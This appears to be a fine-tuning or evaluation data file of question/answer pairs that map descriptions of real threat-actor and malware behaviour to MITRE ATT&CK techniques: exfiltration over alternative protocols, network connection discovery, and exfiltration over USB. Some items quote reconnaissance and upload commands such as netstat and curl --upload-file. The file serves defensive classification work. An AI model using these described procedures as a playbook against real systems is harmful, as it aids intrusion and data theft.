+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq connects to a predefined domain on port 443 to exfil gathered information.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can exfiltrate credentials over the network via UDP.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.","Tecnique: T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.,"Tecnique: T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rclone can exfiltrate data over SFTP or HTTPS via WebDAV.,"Tecnique: T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used FTP to exfiltrate files (separately from the C2 channel).,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used FTP to exfiltrate collected data.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has exfiltrated data over FTP separately from its primary C2 channel over DNS.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has exfiltrated victim information using FTP.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORALDECK has exfiltrated data in HTTP POST headers.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses HTTP to send data to the C2 server.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can send victim data via FTP with credentials hardcoded in the script.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cherry Picker exfiltrates files over FTP.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has used the curl --upload-file command to exfiltrate data over HTTP.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used FTP to exfiltrate reconnaissance data out.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used ftp for exfiltration.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rclone can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.","Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can exfiltrate data directly to its C2 domain via HTTP.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WARPWIRE can send captured credentials to C2 via HTTP `GET` or `POST` requests.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can upload collected data and files to an FTP server.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ftp may be used to exfiltrate data separate from the main command and control protocol.,"Tecnique: T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used netstat to discover network connections on remote systems.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used the net use command to get a listing on network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can enumerate current network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used the netstat -anpo tcp command to display TCP connections on the victim's machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the BLOODMINE utility to collect data on web requests from Pulse Secure Connect logs.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has used the netstat -naop tcp command to display TCP connections on a victim's machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used netstat -ano | findstr EST to discover network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational”
+(Event ID 1024) to obtain network information from RDP connections. Earth Lusca has also used netstat from a compromised system to obtain network connection information.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used `netstat` and other net commands for network reconnaissance efforts.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used netstat -oan to obtain information about the victim network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used netstat to monitor connections to specific ports.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs local network connection discovery using netstat.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used net use to identify and establish a network connection with a remote host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used quser.exe to identify existing RDP connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used netstat -ano to determine network connection information.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used netstat -an on a victim to get a listing of network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Poseidon Group obtains and saves information about victim network interfaces and addresses.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has run netstat -anp to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify /etc/ld.so.preload.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used `netstat -anop tcp` to discover TCP connections to compromised hosts.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands. Turla RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used `netstat -ano` on compromised hosts to enumerate network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: netstat -ano >> %temp%\download,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used net use to conduct connectivity checks to machines.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to gather TCP and UDP table status listings.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can execute `netstat.exe -f` on a compromised machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has gathered information about local network connections using netstat.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses the netstat -r and netstat -an commands.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can use `netsh wlan show profiles` to list specific Wi-Fi profile details.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can produce a sessions report from compromised hosts.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie executes the netstat -ano command.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can enumerate routine network connections from a compromised host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can discover active sessions for a targeted system.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can use the function GetIpNetTable to recover the last connections to the victim's machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can collect network and active connection information.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The discovery modules used with Duqu can collect information on network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can enumerate all connected drives.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can enumerate the current network connections of a host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the net use, net session, and netstat commands to gather information on network connections.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to execute netstat -ano on a compromised host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT uses the netstat command to find open ports on the victim’s machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used net session on the victim's machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can use netstat, Arp, and Net to discover current TCP connections.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has a plugin to retrieve information about all active network sessions on the infected server.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can identify the IP and port numbers for all remote connections from the compromised host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After loading the keyword and phone data files, MESSAGETAP begins monitoring all network connections to and from the victim server.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete uses the netsh wlan show networks mode=bssid and netsh wlan show interfaces commands to list all nearby WiFi networks and connected interfaces.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use the GetExtendedTcpTable function to retrieve information about established TCP connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has used the ""WNetOpenEnumW"", ""WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can capture session logon details from a compromised host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Commands such as net use and net session can be used in Net to gather information about network connections from a particular host.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo enumerates the current network connections similar to net use .,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum was seen using NetSess to discover NetBIOS sessions.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect active network connections by running netstat -an on a victim.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once inside a Virtual Private Cloud, Pacu can attempt to identify DirectConnect, VPN, or VPC Peering.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module for enumerating TCP and UDP network connections and associated processes using the netstat command.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has used netsh to find RPC connections on remote machines.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use netstat to enumerate current network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses netstat -ano to search for specific IP address ranges.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use netstat to enumerate network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can enumerate drives and Remote Desktop sessions.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain a list of active connections and open ports.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT uses netstat to list TCP connection status.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA can enumerate open ports on a victim machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute the `netstat` command.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter used the Windows function GetExtendedUdpTable to detect connected UDP endpoints.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can collect network connection information.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses the arp -a command.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may use netstat -ano to display active network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can use `WTSEnumerateSessionsW` to monitor remote desktop connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can use netstat to collect a list of network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can use netstat and nbtstat to detect active network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can gather information about TCP connection state.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses netstat -aon to gather network connection information.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can list network connections.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: nbtstat can be used to discover current NetBIOS sessions.,"Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: netstat can be used to enumerate local network connections, including active TCP connections and other network statistics.","Tecnique: T1049 System Network Connections Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has exfiltrated data using USB storage devices.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has a feature to copy files from every drive onto a removable drive in a hidden folder.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SPACESHIP copies staged data to removable drives when they are inserted into the system.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer exfiltrates collected files via removable media from air-gapped victims.,"Tecnique: T1052.001 Exfiltration Over Physical Medium: Exfiltration over USB, Tactic: TA0010 Exfiltration"
